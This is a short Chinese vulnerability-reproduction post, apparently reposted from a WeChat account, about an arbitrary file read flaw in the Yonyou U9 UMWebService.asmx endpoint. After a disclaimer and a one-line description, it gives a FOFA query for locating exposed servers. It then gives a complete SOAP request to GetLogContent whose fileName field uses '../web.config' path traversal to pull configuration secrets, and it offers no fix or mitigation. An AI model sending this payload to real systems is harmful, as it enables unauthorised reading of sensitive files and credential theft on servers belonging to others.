免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
漏洞描述
用友U9多组织企业互联网应用平台UMWebService.asmx存在任意文件读取漏洞。攻击者可以通过发送特定的请求,利用该漏洞获取系统敏感文件。
资产测绘
FOFA:body="logo-u9.png"
漏洞复现
POST /u9/OnLine/UMWebService.asmx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Connection: close Content-Length: 381 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/GetLogContent" Accept-Encoding: gzip <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetLogContent xmlns="http://tempuri.org/"> <fileName>../web.config</fileName> </GetLogContent> </soap:Body> </soap:Envelope>
原文始发于微信公众号(漏洞文库):【漏洞复现】用友U9-UMWebService.asmx存在任意文件读取漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论